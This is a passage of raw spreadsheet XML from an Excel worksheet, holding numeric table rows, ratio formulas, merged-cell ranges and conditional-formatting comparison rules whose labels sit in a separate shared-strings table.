        <v>1306</v>
      </c>
      <c r="E35" s="281">
        <v>200430</v>
      </c>
      <c r="F35" s="281">
        <v>3309</v>
      </c>
      <c r="G35" s="281">
        <v>203672</v>
      </c>
      <c r="H35" s="281">
        <v>2</v>
      </c>
      <c r="I35" s="281">
        <v>1702</v>
      </c>
      <c r="J35" s="454">
        <v>3006</v>
      </c>
      <c r="K35" s="314">
        <v>345</v>
      </c>
      <c r="L35" s="454">
        <v>343171</v>
      </c>
      <c r="M35" s="281">
        <v>19761</v>
      </c>
      <c r="N35" s="454">
        <v>2507822</v>
      </c>
      <c r="O35" s="572"/>
      <c r="P35" s="572"/>
      <c r="Q35" s="572"/>
      <c r="S35" s="214"/>
    </row>
    <row r="36" spans="1:19">
      <c r="A36" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B36" s="281">
        <v>6415</v>
      </c>
      <c r="C36" s="281">
        <v>336609</v>
      </c>
      <c r="D36" s="281">
        <v>343024</v>
      </c>
      <c r="E36" s="281">
        <v>2418026</v>
      </c>
      <c r="F36" s="281">
        <v>561148</v>
      </c>
      <c r="G36" s="281">
        <v>2979174</v>
      </c>
      <c r="H36" s="281">
        <v>6420</v>
      </c>
      <c r="I36" s="281">
        <v>6435</v>
      </c>
      <c r="J36" s="454">
        <v>343052</v>
      </c>
      <c r="K36" s="314">
        <v>4223984</v>
      </c>
      <c r="L36" s="454">
        <v>21058053</v>
      </c>
      <c r="M36" s="281">
        <v>0</v>
      </c>
      <c r="N36" s="454">
        <v>4</v>
      </c>
      <c r="O36" s="572"/>
      <c r="P36" s="572"/>
      <c r="Q36" s="572"/>
      <c r="S36" s="214"/>
    </row>
    <row r="37" spans="1:19" ht="26.25" thickBot="1">
      <c r="A37" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B37" s="283">
        <f t="shared" ref="B37:J37" si="12">B36/B35</f>
        <v>77.289156626506028</v>
      </c>
      <c r="C37" s="283">
        <f t="shared" si="12"/>
        <v>275.23221586263287</v>
      </c>
      <c r="D37" s="283">
        <f t="shared" si="12"/>
        <v>262.65237366003061</v>
      </c>
      <c r="E37" s="283">
        <f t="shared" si="12"/>
        <v>12.064191987227462</v>
      </c>
      <c r="F37" s="283">
        <f t="shared" si="12"/>
        <v>169.58235116349351</v>
      </c>
      <c r="G37" s="283">
        <f t="shared" si="12"/>
        <v>14.627312541733769</v>
      </c>
      <c r="H37" s="283">
        <f t="shared" si="12"/>
        <v>3210</v>
      </c>
      <c r="I37" s="283">
        <f t="shared" si="12"/>
        <v>3.7808460634547592</v>
      </c>
      <c r="J37" s="313">
        <f t="shared" si="12"/>
        <v>114.12242182302063</v>
      </c>
      <c r="K37" s="368">
        <v>9307.9714999999997</v>
      </c>
      <c r="L37" s="457">
        <v>60.108400000000003</v>
      </c>
      <c r="M37" s="459">
        <v>0</v>
      </c>
      <c r="N37" s="457">
        <v>0</v>
      </c>
      <c r="O37" s="572"/>
      <c r="P37" s="572"/>
      <c r="Q37" s="572"/>
      <c r="S37" s="214"/>
    </row>
    <row r="38" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A38" s="734" t="s">
        <v>4472</v>
      </c>
      <c r="B38" s="735"/>
      <c r="C38" s="735"/>
      <c r="D38" s="735"/>
      <c r="E38" s="735"/>
      <c r="F38" s="735"/>
      <c r="G38" s="735"/>
      <c r="H38" s="735"/>
      <c r="I38" s="735"/>
      <c r="J38" s="735"/>
      <c r="K38" s="735"/>
      <c r="L38" s="735"/>
      <c r="M38" s="735"/>
      <c r="N38" s="736"/>
      <c r="O38" s="572"/>
      <c r="P38" s="572"/>
      <c r="Q38" s="572"/>
      <c r="S38" s="214"/>
    </row>
    <row r="39" spans="1:19" ht="14.25" customHeight="1">
      <c r="A39" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B39" s="546">
        <v>0.26967994498529679</v>
      </c>
      <c r="C39" s="546">
        <v>0.57996865119042107</v>
      </c>
      <c r="D39" s="546">
        <v>0.61791438065332471</v>
      </c>
      <c r="E39" s="546">
        <v>0.69413124250258451</v>
      </c>
      <c r="F39" s="546">
        <v>0.61051394146839333</v>
      </c>
      <c r="G39" s="546">
        <v>0.76870611478580742</v>
      </c>
      <c r="H39" s="546">
        <v>0</v>
      </c>
      <c r="I39" s="546">
        <v>0.40451991747794519</v>
      </c>
      <c r="J39" s="547">
        <v>0.66742381247191462</v>
      </c>
      <c r="K39" s="548">
        <v>0.55595899999999998</v>
      </c>
      <c r="L39" s="549">
        <v>0.66742400000000002</v>
      </c>
      <c r="M39" s="550">
        <v>0.415605</v>
      </c>
      <c r="N39" s="549">
        <v>0.70064899999999997</v>
      </c>
      <c r="O39" s="214"/>
      <c r="S39" s="214"/>
    </row>
    <row r="40" spans="1:19" ht="36.75" customHeight="1">
      <c r="A40" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B40" s="260" t="s">
        <v>4797</v>
      </c>
      <c r="C40" s="260" t="s">
        <v>4798</v>
      </c>
      <c r="D40" s="260" t="s">
        <v>4799</v>
      </c>
      <c r="E40" s="260" t="s">
        <v>4800</v>
      </c>
      <c r="F40" s="260" t="s">
        <v>4801</v>
      </c>
      <c r="G40" s="260" t="s">
        <v>4802</v>
      </c>
      <c r="H40" s="260" t="s">
        <v>1786</v>
      </c>
      <c r="I40" s="260" t="s">
        <v>4803</v>
      </c>
      <c r="J40" s="312" t="s">
        <v>4804</v>
      </c>
      <c r="K40" s="436" t="s">
        <v>4856</v>
      </c>
      <c r="L40" s="437" t="s">
        <v>4857</v>
      </c>
      <c r="M40" s="315" t="s">
        <v>4777</v>
      </c>
      <c r="N40" s="437" t="s">
        <v>4858</v>
      </c>
      <c r="O40" s="262"/>
      <c r="S40" s="214"/>
    </row>
    <row r="41" spans="1:19" ht="25.5">
      <c r="A41" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B41" s="281">
        <v>3</v>
      </c>
      <c r="C41" s="281">
        <v>13</v>
      </c>
      <c r="D41" s="281">
        <v>16</v>
      </c>
      <c r="E41" s="281">
        <v>79</v>
      </c>
      <c r="F41" s="281">
        <v>42</v>
      </c>
      <c r="G41" s="281">
        <v>121</v>
      </c>
      <c r="H41" s="281">
        <v>2</v>
      </c>
      <c r="I41" s="281">
        <v>10</v>
      </c>
      <c r="J41" s="311">
        <v>24</v>
      </c>
      <c r="K41" s="451">
        <v>10</v>
      </c>
      <c r="L41" s="454">
        <v>113</v>
      </c>
      <c r="M41" s="449">
        <v>2</v>
      </c>
      <c r="N41" s="454">
        <v>4</v>
      </c>
      <c r="S41" s="214"/>
    </row>
    <row r="42" spans="1:19">
      <c r="A42" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B42" s="364" t="s">
        <v>4794</v>
      </c>
      <c r="C42" s="364" t="s">
        <v>4639</v>
      </c>
      <c r="D42" s="364" t="s">
        <v>4640</v>
      </c>
      <c r="E42" s="364" t="s">
        <v>4805</v>
      </c>
      <c r="F42" s="364" t="s">
        <v>4308</v>
      </c>
      <c r="G42" s="364" t="s">
        <v>4309</v>
      </c>
      <c r="H42" s="364" t="s">
        <v>4795</v>
      </c>
      <c r="I42" s="364" t="s">
        <v>4806</v>
      </c>
      <c r="J42" s="365" t="s">
        <v>4807</v>
      </c>
      <c r="K42" s="455" t="s">
        <v>4859</v>
      </c>
      <c r="L42" s="456" t="s">
        <v>4807</v>
      </c>
      <c r="M42" s="450" t="s">
        <v>4774</v>
      </c>
      <c r="N42" s="456" t="s">
        <v>4860</v>
      </c>
      <c r="S42" s="214"/>
    </row>
    <row r="43" spans="1:19">
      <c r="A43" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B43" s="281">
        <f t="shared" ref="B43:J43" si="13">B45+B44</f>
        <v>81</v>
      </c>
      <c r="C43" s="281">
        <f t="shared" si="13"/>
        <v>1219</v>
      </c>
      <c r="D43" s="281">
        <f t="shared" si="13"/>
        <v>1300</v>
      </c>
      <c r="E43" s="281">
        <f t="shared" si="13"/>
        <v>2667</v>
      </c>
      <c r="F43" s="281">
        <f t="shared" si="13"/>
        <v>2111</v>
      </c>
      <c r="G43" s="281">
        <f t="shared" si="13"/>
        <v>4711</v>
      </c>
      <c r="H43" s="281">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="I43" s="281">
        <f t="shared" si="13"/>
        <v>1675</v>
      </c>
      <c r="J43" s="311">
        <f t="shared" si="13"/>
        <v>2975</v>
      </c>
      <c r="K43" s="656">
        <f>K44</f>
        <v>307</v>
      </c>
      <c r="L43" s="449">
        <f t="shared" ref="L43:N43" si="14">L44</f>
        <v>68626</v>
      </c>
      <c r="M43" s="656">
        <f t="shared" si="14"/>
        <v>19761</v>
      </c>
      <c r="N43" s="458">
        <f t="shared" si="14"/>
        <v>2507693</v>
      </c>
      <c r="O43" s="572"/>
      <c r="P43" s="572"/>
      <c r="Q43" s="572"/>
      <c r="S43" s="214"/>
    </row>
    <row r="44" spans="1:19">
      <c r="A44" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B44" s="281">
        <v>81</v>
      </c>
      <c r="C44" s="281">
        <v>1219</v>
      </c>
      <c r="D44" s="281">
        <v>1300</v>
      </c>
      <c r="E44" s="281">
        <v>2667</v>
      </c>
      <c r="F44" s="281">
        <v>2111</v>
      </c>
      <c r="G44" s="281">
        <v>4711</v>
      </c>
      <c r="H44" s="281">
        <v>0</v>
      </c>
      <c r="I44" s="281">
        <v>1675</v>
      </c>
      <c r="J44" s="311">
        <v>2975</v>
      </c>
      <c r="K44" s="451">
        <v>307</v>
      </c>
      <c r="L44" s="454">
        <v>68626</v>
      </c>
      <c r="M44" s="449">
        <v>19761</v>
      </c>
      <c r="N44" s="454">
        <v>2507693</v>
      </c>
      <c r="O44" s="572"/>
      <c r="P44" s="572"/>
      <c r="Q44" s="572"/>
      <c r="S44" s="214"/>
    </row>
    <row r="45" spans="1:19">
      <c r="A45" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B45" s="281">
        <v>0</v>
      </c>
      <c r="C45" s="281">
        <v>0</v>
      </c>
      <c r="D45" s="281">
        <v>0</v>
      </c>
      <c r="E45" s="281">
        <v>0</v>
      </c>
      <c r="F45" s="281">
        <v>0</v>
      </c>
      <c r="G45" s="281">
        <v>0</v>
      </c>
      <c r="H45" s="281">
        <v>0</v>
      </c>
      <c r="I45" s="281">
        <v>0</v>
      </c>
      <c r="J45" s="311">
        <v>0</v>
      </c>
      <c r="K45" s="451">
        <v>0</v>
      </c>
      <c r="L45" s="454">
        <v>0</v>
      </c>
      <c r="M45" s="449">
        <v>0</v>
      </c>
      <c r="N45" s="454">
        <v>0</v>
      </c>
      <c r="O45" s="572"/>
      <c r="P45" s="572"/>
      <c r="Q45" s="572"/>
      <c r="S45" s="214"/>
    </row>
    <row r="46" spans="1:19" ht="26.25" thickBot="1">
      <c r="A46" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B46" s="283">
        <v>0</v>
      </c>
      <c r="C46" s="283">
        <v>0</v>
      </c>
      <c r="D46" s="283">
        <v>0</v>
      </c>
      <c r="E46" s="283">
        <v>0</v>
      </c>
      <c r="F46" s="283">
        <v>0</v>
      </c>
      <c r="G46" s="283">
        <v>0</v>
      </c>
      <c r="H46" s="283">
        <v>0</v>
      </c>
      <c r="I46" s="283">
        <v>0</v>
      </c>
      <c r="J46" s="283">
        <v>0</v>
      </c>
      <c r="K46" s="368">
        <v>0</v>
      </c>
      <c r="L46" s="457">
        <v>0</v>
      </c>
      <c r="M46" s="459">
        <v>0</v>
      </c>
      <c r="N46" s="457">
        <v>0</v>
      </c>
      <c r="O46" s="572"/>
      <c r="P46" s="572"/>
      <c r="Q46" s="572"/>
      <c r="S46" s="214"/>
    </row>
    <row r="47" spans="1:19" ht="14.25" customHeight="1" thickTop="1" thickBot="1">
      <c r="A47" s="730" t="s">
        <v>4582</v>
      </c>
      <c r="B47" s="731"/>
      <c r="C47" s="731"/>
      <c r="D47" s="731"/>
      <c r="E47" s="731"/>
      <c r="F47" s="731"/>
      <c r="G47" s="731"/>
      <c r="H47" s="731"/>
      <c r="I47" s="731"/>
      <c r="J47" s="731"/>
      <c r="K47" s="731"/>
      <c r="L47" s="731"/>
      <c r="M47" s="731"/>
      <c r="N47" s="732"/>
      <c r="O47" s="572"/>
      <c r="P47" s="572"/>
      <c r="Q47" s="572"/>
      <c r="S47" s="214"/>
    </row>
    <row r="48" spans="1:19" ht="18.75" customHeight="1" thickTop="1">
      <c r="A48" s="261" t="s">
        <v>640</v>
      </c>
      <c r="B48" s="567">
        <v>0.28603899999999999</v>
      </c>
      <c r="C48" s="567">
        <v>0.57935199999999998</v>
      </c>
      <c r="D48" s="567">
        <v>0.61725699999999994</v>
      </c>
      <c r="E48" s="567">
        <v>0.82584800000000003</v>
      </c>
      <c r="F48" s="567">
        <v>0.65259800000000001</v>
      </c>
      <c r="G48" s="567">
        <v>0.85741800000000001</v>
      </c>
      <c r="H48" s="567">
        <v>9.5346E-2</v>
      </c>
      <c r="I48" s="567">
        <v>0.45726499999999998</v>
      </c>
      <c r="J48" s="568">
        <v>0.67348300000000005</v>
      </c>
      <c r="K48" s="551">
        <v>0.63236800000000004</v>
      </c>
      <c r="L48" s="552">
        <v>0.91297499999999998</v>
      </c>
      <c r="M48" s="553">
        <v>0.415605</v>
      </c>
      <c r="N48" s="552">
        <v>0.72613499999999997</v>
      </c>
      <c r="O48" s="733" t="s">
        <v>2351</v>
      </c>
      <c r="P48" s="733"/>
      <c r="Q48" s="733"/>
      <c r="S48" s="214"/>
    </row>
    <row r="49" spans="1:19" ht="34.5" customHeight="1">
      <c r="A49" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B49" s="260" t="s">
        <v>4657</v>
      </c>
      <c r="C49" s="260" t="s">
        <v>4658</v>
      </c>
      <c r="D49" s="260" t="s">
        <v>4659</v>
      </c>
      <c r="E49" s="260" t="s">
        <v>4660</v>
      </c>
      <c r="F49" s="260" t="s">
        <v>4661</v>
      </c>
      <c r="G49" s="260" t="s">
        <v>4662</v>
      </c>
      <c r="H49" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I49" s="260" t="s">
        <v>4663</v>
      </c>
      <c r="J49" s="312" t="s">
        <v>4664</v>
      </c>
      <c r="K49" s="436" t="s">
        <v>4778</v>
      </c>
      <c r="L49" s="437" t="s">
        <v>4854</v>
      </c>
      <c r="M49" s="315" t="s">
        <v>4777</v>
      </c>
      <c r="N49" s="437" t="s">
        <v>4853</v>
      </c>
      <c r="O49" s="262" t="s">
        <v>1766</v>
      </c>
      <c r="S49" s="214"/>
    </row>
    <row r="50" spans="1:19" ht="25.5">
      <c r="A50" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B50" s="281">
        <v>2</v>
      </c>
      <c r="C50" s="281">
        <v>11</v>
      </c>
      <c r="D50" s="281">
        <v>14</v>
      </c>
      <c r="E50" s="281">
        <v>68</v>
      </c>
      <c r="F50" s="281">
        <v>31</v>
      </c>
      <c r="G50" s="281">
        <v>101</v>
      </c>
      <c r="H50" s="281">
        <v>1</v>
      </c>
      <c r="I50" s="281">
        <v>9</v>
      </c>
      <c r="J50" s="311">
        <v>20</v>
      </c>
      <c r="K50" s="451">
        <v>8</v>
      </c>
      <c r="L50" s="454">
        <v>98</v>
      </c>
      <c r="M50" s="449">
        <v>2</v>
      </c>
      <c r="N50" s="454">
        <v>3</v>
      </c>
      <c r="S50" s="214"/>
    </row>
    <row r="51" spans="1:19">
      <c r="A51" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B51" s="364" t="s">
        <v>4638</v>
      </c>
      <c r="C51" s="364" t="s">
        <v>4639</v>
      </c>
      <c r="D51" s="364" t="s">
        <v>4640</v>
      </c>
      <c r="E51" s="364" t="s">
        <v>4655</v>
      </c>
      <c r="F51" s="364" t="s">
        <v>4656</v>
      </c>
      <c r="G51" s="364" t="s">
        <v>4559</v>
      </c>
      <c r="H51" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I51" s="364" t="s">
        <v>4642</v>
      </c>
      <c r="J51" s="365" t="s">
        <v>4643</v>
      </c>
      <c r="K51" s="455" t="s">
        <v>4641</v>
      </c>
      <c r="L51" s="456" t="s">
        <v>4855</v>
      </c>
      <c r="M51" s="450" t="s">
        <v>4774</v>
      </c>
      <c r="N51" s="456" t="s">
        <v>4775</v>
      </c>
      <c r="S51" s="214"/>
    </row>
    <row r="52" spans="1:19">
      <c r="A52" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B52" s="281">
        <f t="shared" ref="B52:J52" si="15">B54+B53</f>
        <v>105</v>
      </c>
      <c r="C52" s="281">
        <f t="shared" si="15"/>
        <v>335783</v>
      </c>
      <c r="D52" s="281">
        <f t="shared" si="15"/>
        <v>335864</v>
      </c>
      <c r="E52" s="281">
        <f t="shared" si="15"/>
        <v>2337549</v>
      </c>
      <c r="F52" s="281">
        <f t="shared" si="15"/>
        <v>407020</v>
      </c>
      <c r="G52" s="281">
        <f t="shared" si="15"/>
        <v>2680744</v>
      </c>
      <c r="H52" s="281">
        <f t="shared" si="15"/>
        <v>24</v>
      </c>
      <c r="I52" s="281">
        <f t="shared" si="15"/>
        <v>1728</v>
      </c>
      <c r="J52" s="311">
        <f t="shared" si="15"/>
        <v>337620</v>
      </c>
      <c r="K52" s="656">
        <f>K53+K54</f>
        <v>22186</v>
      </c>
      <c r="L52" s="449">
        <f t="shared" ref="L52" si="16">L53+L54</f>
        <v>609009</v>
      </c>
      <c r="M52" s="656">
        <f t="shared" ref="M52" si="17">M53+M54</f>
        <v>19761</v>
      </c>
      <c r="N52" s="458">
        <f t="shared" ref="N52" si="18">N53+N54</f>
        <v>2507826</v>
      </c>
      <c r="O52" s="572"/>
      <c r="P52" s="572"/>
      <c r="Q52" s="572"/>
      <c r="S52" s="214"/>
    </row>
    <row r="53" spans="1:19">
      <c r="A53" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B53" s="281">
        <v>82</v>
      </c>
      <c r="C53" s="281">
        <v>1221</v>
      </c>
      <c r="D53" s="281">
        <v>1302</v>
      </c>
      <c r="E53" s="281">
        <v>200086</v>
      </c>
      <c r="F53" s="281">
        <v>3259</v>
      </c>
      <c r="G53" s="281">
        <v>202146</v>
      </c>
      <c r="H53" s="281">
        <v>1</v>
      </c>
      <c r="I53" s="281">
        <v>1700</v>
      </c>
      <c r="J53" s="311">
        <v>3003</v>
      </c>
      <c r="K53" s="451">
        <v>326</v>
      </c>
      <c r="L53" s="454">
        <v>341824</v>
      </c>
      <c r="M53" s="449">
        <v>19761</v>
      </c>
      <c r="N53" s="454">
        <v>2507822</v>
      </c>
      <c r="O53" s="572"/>
      <c r="P53" s="572"/>
      <c r="Q53" s="572"/>
      <c r="S53" s="214"/>
    </row>
    <row r="54" spans="1:19">
      <c r="A54" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B54" s="281">
        <v>23</v>
      </c>
      <c r="C54" s="281">
        <v>334562</v>
      </c>
      <c r="D54" s="281">
        <v>334562</v>
      </c>
      <c r="E54" s="281">
        <v>2137463</v>
      </c>
      <c r="F54" s="281">
        <v>403761</v>
      </c>
      <c r="G54" s="281">
        <v>2478598</v>
      </c>
      <c r="H54" s="281">
        <v>23</v>
      </c>
      <c r="I54" s="281">
        <v>28</v>
      </c>
      <c r="J54" s="311">
        <v>334617</v>
      </c>
      <c r="K54" s="451">
        <v>21860</v>
      </c>
      <c r="L54" s="454">
        <v>267185</v>
      </c>
      <c r="M54" s="449">
        <v>0</v>
      </c>
      <c r="N54" s="454">
        <v>4</v>
      </c>
      <c r="O54" s="572"/>
      <c r="P54" s="572"/>
      <c r="Q54" s="572"/>
      <c r="S54" s="214"/>
    </row>
    <row r="55" spans="1:19" ht="26.25" thickBot="1">
      <c r="A55" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B55" s="283">
        <f t="shared" ref="B55:J55" si="19">B54/B53</f>
        <v>0.28048780487804881</v>
      </c>
      <c r="C55" s="283">
        <f t="shared" si="19"/>
        <v>274.006552006552</v>
      </c>
      <c r="D55" s="283">
        <f t="shared" si="19"/>
        <v>256.96006144393243</v>
      </c>
      <c r="E55" s="283">
        <f t="shared" si="19"/>
        <v>10.682721429785193</v>
      </c>
      <c r="F55" s="283">
        <f t="shared" si="19"/>
        <v>123.89107088063824</v>
      </c>
      <c r="G55" s="283">
        <f t="shared" si="19"/>
        <v>12.261424910708103</v>
      </c>
      <c r="H55" s="283">
        <f t="shared" si="19"/>
        <v>23</v>
      </c>
      <c r="I55" s="283">
        <f t="shared" si="19"/>
        <v>1.6470588235294119E-2</v>
      </c>
      <c r="J55" s="283">
        <f t="shared" si="19"/>
        <v>111.42757242757243</v>
      </c>
      <c r="K55" s="368">
        <v>51.419699999999999</v>
      </c>
      <c r="L55" s="457">
        <v>1.0026999999999999</v>
      </c>
      <c r="M55" s="459">
        <v>0</v>
      </c>
      <c r="N55" s="457">
        <v>0</v>
      </c>
      <c r="O55" s="572"/>
      <c r="P55" s="572"/>
      <c r="Q55" s="572"/>
      <c r="S55" s="214"/>
    </row>
    <row r="56" spans="1:19" ht="13.5" thickTop="1"/>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="B2:J2"/>
    <mergeCell ref="K2:L2"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="A4:N4"/>
    <mergeCell ref="O48:Q48"/>
    <mergeCell ref="A11:N11"/>
    <mergeCell ref="A20:N20"/>
    <mergeCell ref="A29:N29"/>
    <mergeCell ref="A38:N38"/>
    <mergeCell ref="A47:N47"/>
  </mergeCells>
  <conditionalFormatting sqref="B48 E48:N48">
    <cfRule type="expression" dxfId="215" priority="149">
      <formula>IF(B48&lt;B39,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B42:C42 F42:J42 B43:N45">
    <cfRule type="expression" dxfId="214" priority="29">
      <formula>IF(B42&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B16:J18">
    <cfRule type="expression" dxfId="213" priority="52">
      <formula>IF(B16&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B28:J28">
    <cfRule type="expression" dxfId="212" priority="16">
      <formula>IF(B28&gt;B19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B35:J36">
    <cfRule type="expression" dxfId="211" priority="65">
      <formula>IF(B35&gt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B37:J37">
    <cfRule type="expression" dxfId="210" priority="47">
      <formula>IF(B37&gt;B28,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B53:J53 B54:N54">
    <cfRule type="expression" dxfId="209" priority="60">
      <formula>IF(B53&gt;B35,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B55:J55">
    <cfRule type="expression" dxfId="208" priority="48">
      <formula>IF(B55&gt;B46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B7:N7">
    <cfRule type="expression" dxfId="207" priority="483">
      <formula>IF(OR(B7&lt;B8,B7&lt;B9),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B12:N12">
    <cfRule type="expression" dxfId="206" priority="144">
      <formula>IF(B12&gt;B5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B19:N19">
    <cfRule type="expression" dxfId="205" priority="51">
      <formula>IF(B19&gt;B10,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B39:N39">
    <cfRule type="expression" dxfId="204" priority="59">
      <formula>IF(B39&gt;B30,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B41:N41">
    <cfRule type="expression" dxfId="203" priority="63">
      <formula>IF(B41&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B46:N46">
    <cfRule type="expression" dxfId="202" priority="49">
      <formula>IF(B46&gt;B37,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B50:N50">
    <cfRule type="expression" dxfId="201" priority="61">
      <formula>IF(B50&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D6:D9">
    <cfRule type="expression" dxfId="200" priority="526">
      <formula>IF(OR(D6&lt;B6,D6&lt;C6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D14 D16:D18">
    <cfRule type="expression" dxfId="199" priority="57">
      <formula>IF(OR(D14&lt;B14,D14&lt;C14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23">
    <cfRule type="expression" dxfId="198" priority="15">
      <formula>IF(OR(D23&lt;B23,D23&lt;C23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32 D35:D36">
    <cfRule type="expression" dxfId="197" priority="40">
      <formula>IF(OR(D32&lt;B32,D32&lt;C32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D41 D43:D45">
    <cfRule type="expression" dxfId="196" priority="34">
      <formula>IF(OR(D41&lt;B41,D41&lt;C41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D50 D53:D54">
    <cfRule type="expression" dxfId="195" priority="28">
      <formula>IF(OR(D50&lt;B50,D50&lt;C50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E6:G9">
    <cfRule type="expression" dxfId="194" priority="513">
      <formula>IF(E6&lt;B6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E14:G14 E16:G18">
    <cfRule type="expression" dxfId="193" priority="56">
      <formula>IF(E14&lt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E23:G23">
    <cfRule type="expression" dxfId="192" priority="14">
      <formula>IF(E23&lt;B23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E32:G32 E35:G36">
    <cfRule type="expression" dxfId="191" priority="39">
      <formula>IF(E32&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E41:G41 F42:G42 E43:G45">
    <cfRule type="expression" dxfId="190" priority="33">
      <formula>IF(E41&lt;B41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="E50:G50 E53:G54">
    <cfRule type="expression" dxfId="189" priority="27">
      <formula>IF(E50&lt;B50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G6:G9">
    <cfRule type="expression" dxfId="188" priority="512">
      <formula>IF(OR(G6&lt;E6,G6&lt;F6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G14 G16:G18">
    <cfRule type="expression" dxfId="187" priority="55">
      <formula>IF(OR(G14&lt;E14,G14&lt;F14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G23">
    <cfRule type="expression" dxfId="186" priority="13">
      <formula>IF(OR(G23&lt;E23,G23&lt;F23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G32 G35:G36">
    <cfRule type="expression" dxfId="185" priority="38">
      <formula>IF(OR(G32&lt;E32,G32&lt;F32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G41:G45">
    <cfRule type="expression" dxfId="184" priority="32">
      <formula>IF(OR(G41&lt;E41,G41&lt;F41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="G50 G53:G54">
    <cfRule type="expression" dxfId="183" priority="26">
      <formula>IF(OR(G50&lt;E50,G50&lt;F50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I6:I9">
    <cfRule type="expression" dxfId="182" priority="508">
      <formula>IF(I6&lt;H6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I14 I16:I18">
    <cfRule type="expression" dxfId="181" priority="54">
      <formula>IF(I14&lt;H14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I23">
    <cfRule type="expression" dxfId="180" priority="12">
      <formula>IF(I23&lt;H23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I32 I35:I36">
    <cfRule type="expression" dxfId="179" priority="37">
      <formula>IF(I32&lt;H32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I41:I45">
    <cfRule type="expression" dxfId="178" priority="31">
      <formula>IF(I41&lt;H41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I50 I53:I54">
    <cfRule type="expression" dxfId="177" priority="25">
      <formula>IF(I50&lt;H50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J6:J9">
    <cfRule type="expression" dxfId="176" priority="504">
      <formula>IF(OR(J6&lt;H6,J6&lt;I6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J14 J16:J18">
    <cfRule type="expression" dxfId="175" priority="53">
      <formula>IF(OR(J14&lt;H14,J14&lt;I14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J23">
    <cfRule type="expression" dxfId="174" priority="11">
      <formula>IF(OR(J23&lt;H23,J23&lt;I23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J32 J35:J36">
